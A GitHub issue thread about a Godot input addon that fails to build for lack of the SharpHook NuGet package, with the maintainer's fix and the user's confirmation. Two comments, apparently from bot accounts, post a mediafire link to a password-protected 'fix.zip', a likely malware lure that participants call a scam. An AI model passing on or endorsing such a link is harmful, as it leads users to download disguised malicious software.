### ISSUE TITLE
Failed To Build Project

### ISSUE THREAD

**Issue by Ryixion** [Darnoman/Godot-GlobalInput-Addon#7]
It fails to build the project. i tried it in 4.3 and downgraded and tried 4.2. 

edit: also yes im making a Guitar hero input viewer just for fun

i get:

CS0246: The type or namespace name 'SharpHook' could not be found (are you missing a using directive or an assembly reference?) C:\Users\retro\Documents\Game Development\Godot\Projects\gh-input-viewer-\addons\global_input\autoload\global_input_csharp\GlobalInputCSharp.cs(4,7)

CS0246: The type or namespace name 'KeyboardHookEventArgs' could not be found (are you missing a using directive or an assembly reference?) C:\Users\retro\Documents\Game Development\Godot\Projects\gh-input-viewer-\addons\global_input\autoload\global_input_csharp\GlobalInputCSharp.cs(214,50)

CS0246: The type or namespace name 'KeyboardHookEventArgs' could not be found (are you missing a using directive or an assembly reference?) C:\Users\retro\Documents\Game Development\Godot\Projects\gh-input-viewer-\addons\global_input\autoload\global_input_csharp\GlobalInputCSharp.cs(223,51)

CS0246: The type or namespace name 'MouseHookEventArgs' could not be found (are you missing a using directive or an assembly reference?) C:\Users\retro\Documents\Game Development\Godot\Projects\gh-input-viewer-\addons\global_input\autoload\global_input_csharp\GlobalInputCSharp.cs(232,58)

CS0246: The type or namespace name 'MouseHookEventArgs' could not be found (are you missing a using directive or an assembly reference?) C:\Users\retro\Documents\Game Development\Godot\Projects\gh-input-viewer-\addons\global_input\autoload\global_input_csharp\GlobalInputCSharp.cs(241,59)

CS0246: The type or namespace name 'MouseWheelHookEventArgs' could not be found (are you missing a using directive or an assembly reference?) C:\Users\retro\Documents\Game Development\Godot\Projects\gh-input-viewer-\addons\global_input\autoload\global_input_csharp\GlobalInputCSharp.cs(250,50)

CS0246: The type or namespace name 'TaskPoolGlobalHook' could not be found (are you missing a using directive or an assembly reference?) C:\Users\retro\Documents\Game Development\Godot\Projects\gh-input-viewer-\addons\global_input\autoload\global_input_csharp\GlobalInputCSharp.cs(10,5)

**Comment by Darnoman** [comment]
did you get the Sharphook nuget package? do so with "dotnet add package SharpHook" in a command line within your project.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Darnoman** [comment]
Idk who that was... but never download anything a random person tell you to unless you know what it is.

**Comment by Ryixion** [comment]
im aware lol that was the most obv scam ive ever seen

**Comment by Ryixion** [comment]
also by command line do you just mean like in a script?

**Comment by Darnoman** [comment]
like a terminal either through vscode (if you have that) or through window cmd.

**Comment by Ryixion** [comment]
what is up with these bots

**Comment by Darnoman** [comment]
i have no idea first time i've seen them (maybe because im bringing up terminal and cmd lines)

but anyways like this within your project directory. Cause it needs sharphook to run.
![image](https://github.com/user-attachments/assets/8e7fcef6-88f7-485e-a96c-934cba1a6fe1)

**Comment by Darnoman** [comment]
either that or use the old branch which only works on Windows but a drag and drop solution without needing sharp hook.

**Comment by Ryixion** [comment]
it worked, ty

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
